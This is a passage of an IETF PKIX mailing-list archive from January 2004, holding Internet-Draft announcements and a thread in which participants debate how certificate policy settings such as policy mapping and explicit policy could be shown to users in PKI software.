10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>4.1.2.4 states<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>“(a) attribute values encoded in different types = (e.g.,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> PrintableString and BMPString) = MAY be assumed to represent<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> different = strings;”<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If my concerns are wrong and the issuing such certificates is = allowed, then this needs to be clarified.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><strong><b><font size=3D2 color=3Dolive = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial;color:olive'>Stefan = Santesson</span></font></b></strong><o:p></o:p></p> <p class=3DMsoNormal><font size=3D2 color=3Dolive face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:olive'>Program Manager, Windows = Security</span></font><o:p></o:p></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> </blockquote> </div> </div> </body> </html> ------_=_NextPart_001_01C3E74F.BDE13EC0-- --------------InterScan_NT_MIME_Boundary-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGpVl9000744; Fri, 30 Jan 2004 08:51:31 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UGpVXq000743; Fri, 30 Jan 2004 08:51:31 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGpU8R000736 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 08:51:30 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA27053; Fri, 30 Jan 2004 11:51:27 -0500 (EST) Message-Id: <200401301651.LAA27053@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-pi-09.txt Date: Fri, 30 Jan 2004 11:51:27 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Internet X.509 Public Key Infrastructure Permanent Identifier Author(s) : D. Pinkas, T. Gindin Filename : draft-ietf-pkix-pi-09.txt Pages : 13 Date : 2004-1-29 This document define a new form of name, called permanent identifier, that may be included in the subjectAltName extension of a public key certificate issued to an entity. The permanent identifier is an optional feature that may be used by a CA to indicate that the certificate relates to the same entity even if the name or the affiliation of that entity stored in the subject or another name form in the subjectAltName extension has changed. The subject name, carried in the subject field, is only unique for each subject entity certified by the one CA as defined by the issuer name field. Also, the new name form can carry a name that is unique for each subject entity certified by a CA. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-pi-09.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-pi-09.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-pi-09.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-30121157.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-pi-09.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-pi-09.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-30121157.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGpPaA000729; Fri, 30 Jan 2004 08:51:25 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UGpP1l000728; Fri, 30 Jan 2004 08:51:25 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGpOxK000721 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 08:51:24 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA27014; Fri, 30 Jan 2004 11:51:22 -0500 (EST) Message-Id: <200401301651.LAA27014@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-rsa-pkalgs-02.txt Date: Fri, 30 Jan 2004 11:51:21 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Additional Algorithms and Identifiers for RSA Cryptography for use in the Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile Author(s) : R. Housley, B. Kaliski Filename : draft-ietf-pkix-rsa-pkalgs-02.txt Pages : 22 Date : 2004-1-29 This document supplements RFC 3279. It describes the conventions for using the RSASSA-PSS signature algorithm, the RSAES-OAEP key transport algorithm, and additional one-way hash functions with the PKCS #1 version 1.5 signature algorithm in the Internet X.509 Public Key Infrastructure (PKI). Encoding formats, algorithm identifiers, and parameter formats are specified. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-rsa-pkalgs-02.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-rsa-pkalgs-02.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-rsa-pkalgs-02.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-30121148.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-rsa-pkalgs-02.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-rsa-pkalgs-02.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-30121148.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGpAFD000696; Fri, 30 Jan 2004 08:51:10 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UGpAug000694; Fri, 30 Jan 2004 08:51:10 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp.cs.auckland.ac.nz (smtp.cs.auckland.ac.nz [130.216.33.151]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGp864000677 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 08:51:09 -0800 (PST) (envelope-from pgut001@cs.auckland.ac.nz) Received: from cs.auckland.ac.nz (medusa01.cs.auckland.ac.nz [130.216.34.33]) by smtp.cs.auckland.ac.nz (Postfix) with ESMTP id 544FD34035; Sat, 31 Jan 2004 04:49:29 +1300 (NZDT) Received: (from pgut001@localhost) by cs.auckland.ac.nz (8.11.6/8.11.6) id i0UFoJ110410; Sat, 31 Jan 2004 04:50:19 +1300 Date: Sat, 31 Jan 2004 04:50:19 +1300 Message-Id: <200401301550.i0UFoJ110410@cs.auckland.ac.nz> From: pgut001@cs.auckland.ac.nz (Peter Gutmann) To: dcross@microsoft.com, pmhesse@geminisecurity.com Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Cc: ietf-pkix@imc.org Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> "David Cross" <dcross@microsoft.com> writes: >My grandmother just won't understand the meaning of "initial-policy-mapping- >inhibit" no matter how much she loves me. And therein lies the problem. It's not just Joe Sixpack who can't understand any of this stuff, no-one apart from PKI theologists know (or care) about it. So the approach that a typical technical manager/administrator who has to work with certs will take is to use "policy = CA", with the Foo policy being implicitly enforced by having the cert issued by the Foo CA, and the Bar policy enforced by the Bar CA. Going beyond private CAs (whose policy is usually an implicit "Whatever we say it is"), if you look at almost any public CA you'll see a pile of top- or intermediate-level CA certs with names that are some variation on "<CA-name> <policy-name> CA" (the most famous being the "Verisign Class X Blah CA" family) - it's the old PEM idea, but without the single root. Policy constraints and enforcement and mappings and whatnot are just fuzzy dice that exist so orgs like the US DoD have something to decorate their certs with. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0U9gZ0S050799; Fri, 30 Jan 2004 01:42:35 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0U9gZAO050798; Fri, 30 Jan 2004 01:42:35 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av7-2-sn4.m-sp.skanova.net (av7-2-sn4.m-sp.skanova.net [81.228.10.109]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0U9gYoH050755 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 01:42:34 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av7-2-sn4.m-sp.skanova.net (Postfix, from userid 502) id E1F0937EEF; Fri, 30 Jan 2004 10:42:28 +0100 (CET) Received: from smtp2-1-sn4.m-sp.skanova.net (smtp2-1-sn4.m-sp.skanova.net [81.228.10.183]) by av7-2-sn4.m-sp.skanova.net (Postfix) with ESMTP id B699437ECD for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 10:42:28 +0100 (CET) Received: from arport (t12o913p105.telia.com [213.64.28.225]) by smtp2-1-sn4.m-sp.skanova.net (Postfix) with SMTP id 8E38437E63; Fri, 30 Jan 2004 10:42:25 +0100 (CET) Message-ID: <00eb01c3e714$9958ed50$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "David Cross" <dcross@microsoft.com>, "Peter Hesse" <pmhesse@geminisecurity.com> Cc: <ietf-pkix@imc.org> References: <3C69AE30038D9A4590F5EC20DCD41F6801671F3D@RED-MSG-41.redmond.corp.microsoft.com> Subject: Re: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Date: Fri, 30 Jan 2004 10:36:53 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 x-mimeole: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Peter, If a sender of a signed message is using a certificate from a PKI that requires policy filtering by the relying party (be it a server or Outlook), then the sender creates a potential security hazard as the relying party after trust anchor installation is likely to also "trust" what effectively could be completely other types of certificates. One culprit is that there is no good universal way to communicate CA policy information, except by requiring relying parties to decipher CP documents, making the configuration process less user-friendly. That is, multiple policy PKIs are not unsuitable only for consumers like David's grandma, but in most open environments where many relying parties are involved. Regarding the user interface, you forgot to mention that the policy settings must be per CA or groups of CAs further complicating matters. But maybe, we are really talking local PKIs here? Anders ----- Original Message ----- From: "David Cross" <dcross@microsoft.com> To: "Peter Hesse" <pmhesse@geminisecurity.com> Cc: <ietf-pkix@imc.org> Sent: Thursday, January 29, 2004 19:30 Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Your 2 cents may not be too far off the mark...however, some comments... A. Today, in a Windows XP+ and Windows Server 2003 environment, we do have the capability to configure an Active Directory (domain) environment as you describe. I agree this is an example of the direction you describe. B. Technically, this also exists in most chaining engines and UI, although the policy information is not exposed as a first class citizen, argueably for several reasons such as my grandmother just is not interested in policy status of my signed mail to her, but I digress... Items C. and D. are the slippery slope that have obvious utility in the enterprise and/or high assurance environments, but not in the general global consumer community. My grandmother just won't understand the meaning of "initial-policy-mapping-inhibit" no matter how much she loves me. David B. Cross -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Hesse Sent: Thursday, January 29, 2004 7:05 AM To: 'Anders Rundgren'; 'Steve Hanna'; 'Stephen Kent' Cc: ietf-pkix@imc.org Subject: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) I'll take the bait and throw this idea out there for you all to think about. It's not entirely my idea, it is based on ideas discussed with Dave Fillingham over the years. Let's assume for the moment that you're working with a PKI with a few different certificate policies in use; they might be hardware/software stored keys, or high/medium/low assurance. It is my suggestion that for a majority of PKI-enabled products with user interfaces, the best solution may be to do the following: A) Provide an administrative interface to map certificate policy OIDs to human readable names, and potentially human readable descriptions of the policies as well. B) When building/validating certification paths, set the initial-policy-set to any policy. When a path successfully validates, display the signature and validation status to the user, along with the human readable names for the policies in the authority-constrained-policy-set, or an indication that the path was not valid under any known policies. If these steps are followed, the user can just be informed that the message they received was valid for "Gemini medium assurance" or something like that. Not much difficulty to implement, nor would it be too difficult to educate the users. Now, assume we're dealing with a PKI larger than a single organization, where there are differing certificate policies and appropriate certificate policy mappings in place. (Such as a Bridge CA environment.) I'm assuming in this case that all certificates that I want my relying parties to accept would have certificate policies asserted. In this case, we add just two more steps: C) When validating paths, set initial-explicit-policy to TRUE, to ensure that only paths valid for a policy would be accepted. (Or, set requireExplicitPolicy through policyConstraints extensions in domain or cross-certificates.) D) Provide users with a switch to enable/disable initial-policy-mapping-inhibit. This may be referred to as "allow only my organization" and "allow other organizations". I'm presuming that cross-certificates would fail to validate if require-explicit was true and policy mappings don't take place. Likewise, even if I received a message from a user from a different organization, I would simply see that the message validated and that it was valid under the "Gemini low assurance policy" or something similar. This doesn't add much implementation difficulty (assuming a compliant path processing system) or make it too confusing for the user. Just my $0.02. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0TIUh2i035174; Thu, 29 Jan 2004 10:30:43 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0TIUh2L035173; Thu, 29 Jan 2004 10:30:43 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail2.microsoft.com (mail2.microsoft.com [131.107.3.124]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0TIUgu6035155 for <ietf-pkix@imc.org>; Thu, 29 Jan 2004 10:30:43 -0800 (PST) (envelope-from dcross@microsoft.com) Received: from mail6.microsoft.com ([157.54.6.196]) by mail2.microsoft.com with Microsoft SMTPSVC(6.0.3790.1041); Thu, 29 Jan 2004 10:30:39 -0800 Received: from inet-vrs-06.redmond.corp.microsoft.com ([157.54.6.181]) by mail6.microsoft.com with Microsoft SMTPSVC(6.0.3790.1069); Thu, 29 Jan 2004 10:30:38 -0800 Received: from 157.54.5.25 by inet-vrs-06.redmond.corp.microsoft.com (InterScan E-Mail VirusWall NT); Thu, 29 Jan 2004 10:30:38 -0800 Received: from RED-MSG-41.redmond.corp.microsoft.com ([157.54.12.201]) by inet-hub-03.redmond.corp.microsoft.com with Microsoft SMTPSVC(6.0.3790.0); Thu, 29 Jan 2004 10:30:38 -0800 x-mimeole: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Date: Thu, 29 Jan 2004 10:30:36 -0800 Message-ID: <3C69AE30038D9A4590F5EC20DCD41F6801671F3D@RED-MSG-41.redmond.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Thread-Index: AcPmXzHmy+NBOsfYQn+IddV3gKhpHQAFbq/QAAfBw5A= From: "David Cross" <dcross@microsoft.com> To: "Peter Hesse" <pmhesse@geminisecurity.com> Cc: <ietf-pkix@imc.org> X-OriginalArrivalTime: 29 Jan 2004 18:30:38.0604 (UTC) FILETIME=[FE3704C0:01C3E695] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0TIUhu6035168 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Your 2 cents may not be too far off the mark...however, some comments... A. Today, in a Windows XP+ and Windows Server 2003 environment, we do have the capability to configure an Active Directory (domain) environment as you describe. I agree this is an example of the direction you describe. B. Technically, this also exists in most chaining engines and UI, although the policy information is not exposed as a first class citizen, argueably for several reasons such as my grandmother just is not interested in policy status of my signed mail to her, but I digress... Items C. and D. are the slippery slope that have obvious utility in the enterprise and/or high assurance environments, but not in the general global consumer community. My grandmother just won't understand the meaning of "initial-policy-mapping-inhibit" no matter how much she loves me. David B. Cross -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Hesse Sent: Thursday, January 29, 2004 7:05 AM To: 'Anders Rundgren'; 'Steve Hanna'; 'Stephen Kent' Cc: ietf-pkix@imc.org Subject: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) I'll take the bait and throw this idea out there for you all to think about. It's not entirely my idea, it is based on ideas discussed with Dave Fillingham over the years. Let's assume for the moment that you're working with a PKI with a few different certificate policies in use; they might be hardware/software stored keys, or high/medium/low assurance. It is my suggestion that for a majority of PKI-enabled products with user interfaces, the best solution may be to do the following: A) Provide an administrative interface to map certificate policy OIDs to human readable names, and potentially human readable descriptions of the policies as well. B) When building/validating certification paths, set the initial-policy-set to any policy. When a path successfully validates, display the signature and validation status to the user, along with the human readable names for the policies in the authority-constrained-policy-set, or an indication that the path was not valid under any known policies. If these steps are followed, the user can just be informed that the message they received was valid for "Gemini medium assurance" or something like that. Not much difficulty to implement, nor would it be too difficult to educate the users. Now, assume we're dealing with a PKI larger than a single organization, where there are differing certificate policies and appropriate certificate policy mappings in place. (Such as a Bridge CA environment.) I'm assuming in this case that all certificates that I want my relying parties to accept would have certificate policies asserted. In this case, we add just two more steps: C) When validating paths, set initial-explicit-policy to TRUE, to ensure that only paths valid for a policy would be accepted. (Or, set requireExplicitPolicy through policyConstraints extensions in domain or cross-certificates.) D) Provide users with a switch to enable/disable initial-policy-mapping-inhibit. This may be referred to as "allow only my organization" and "allow other organizations". I'm presuming that cross-certificates would fail to validate if require-explicit was true and policy mappings don't take place. Likewise, even if I received a message from a user from a different organization, I would simply see that the message validated and that it was valid under the "Gemini low assurance policy" or something similar. This doesn't add much implementation difficulty (assuming a compliant path processing system) or make it too confusing for the user. Just my $0.02. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0TF4dxP018364; Thu, 29 Jan 2004 07:04:39 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0TF4c7H018363; Thu, 29 Jan 2004 07:04:38 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from osf1.gmu.edu (osf1.gmu.edu [129.174.1.13]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0TF4b7O018354 for <ietf-pkix@imc.org>; Thu, 29 Jan 2004 07:04:37 -0800 (PST) (envelope-from pmhesse@geminisecurity.com) Received: from geminiph ([129.174.244.115]) by osf1.gmu.edu (8.8.8/8.8.8) with ESMTP id KAA109655; Thu, 29 Jan 2004 10:04:31 -0500 (EST) Message-Id: <200401291504.KAA109655@osf1.gmu.edu> From: "Peter Hesse" <pmhesse@geminisecurity.com> To: "'Anders Rundgren'" <anders.rundgren@telia.com>, "'Steve Hanna'" <Steve.Hanna@sun.com>, "'Stephen Kent'" <kent@bbn.com> Cc: <ietf-pkix@imc.org> Subject: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Date: Thu, 29 Jan 2004 10:04:31 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Thread-Index: AcPmXzHmy+NBOsfYQn+IddV3gKhpHQAFbq/Q In-Reply-To: <006901c3e63e$89fbfea0$0500a8c0@arport> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> I'll take the bait and throw this idea out there for you all to think about. It's not entirely my idea, it is based on ideas discussed with Dave Fillingham over the years. Let's assume for the moment that you're working with a PKI with a few different certificate policies in use; they might be hardware/software stored keys, or high/medium/low assurance. It is my suggestion that for a majority of PKI-enabled products with user interfaces, the best solution may be to do the following: A) Provide an administrative interface to map certificate policy OIDs to human readable names, and potentially human readable descriptions of the policies as well. B) When building/validating certification paths, set the initial-policy-set to any policy. When a path successfully validates, display the signature and validation status to the user, along with the human readable names for the policies in the authority-constrained-policy-set, or an indication that the path was not valid under any known policies. If these steps are followed, the user can just be informed that the message they received was valid for "Gemini medium assurance" or something like that. Not much difficulty to implement, nor would it be too difficult to educate the users. Now, assume we're dealing with a PKI larger than a single organization, where there are differing certificate policies and appropriate certificate policy mappings in place. (Such as a Bridge CA environment.) I'm assuming in this case that all certificates that I want my relying parties to accept would have certificate policies asserted. In this case, we add just two more steps: C) When validating paths, set initial-explicit-policy to TRUE, to ensure that only paths valid for a policy would be accepted. (Or, set requireExplicitPolicy through policyConstraints extensions in domain or cross-certificates.) D) Provide users with a switch to enable/disable initial-policy-mapping-inhibit. This may be referred to as "allow only my organization" and "allow other organizations". I'm presuming that cross-certificates would fail to validate if require-explicit was true and policy mappings don't take place. Likewise, even if I received a message from a user from a different organization, I would simply see that the message validated and that it was valid under the "Gemini low assurance policy" or something similar. This doesn't add much implementation difficulty (assuming a compliant path processing system) or make it too confusing for the user. Just my $0.02. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0T8AFwQ048403; Thu, 29 Jan 2004 00:10:15 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0T8AF8U048401; Thu, 29 Jan 2004 00:10:15 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av5-2-sn1.fre.skanova.net (av5-2-sn1.fre.skanova.net [81.228.11.112]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0T8AEac048366 for <ietf-pkix@imc.org>; Thu, 29 Jan 2004 00:10:14 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av5-2-sn1.fre.skanova.net (Postfix, from userid 502) id 12DE337E44; Thu, 29 Jan 2004 09:10:09 +0100 (CET) Received: from smtp4.hy.skanova.net (smtp4.hy.skanova.net [195.67.199.133]) by av5-2-sn1.fre.skanova.net (Postfix) with ESMTP id F20D837E44; Thu, 29 Jan 2004 09:10:08 +0100 (CET) Received: from arport (t11o913p33.telia.com [213.64.28.33]) by smtp4.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0T8A687004759; Thu, 29 Jan 2004 09:10:07 +0100 (CET) Message-ID: <006901c3e63e$89fbfea0$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Steve Hanna" <Steve.Hanna@sun.com>, "Stephen Kent" <kent@bbn.com> Cc: <ietf-pkix@imc.org> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> <005001c3e50b$9cddac00$0500a8c0@arport> <p06020405bc3d7a1ddfed@[128.33.244.157]> <4017DE9A.988E5F3A@sun.com> <p06020405bc3db694269c@[128.33.244.157]> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Thu, 29 Jan 2004 09:04:35 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> 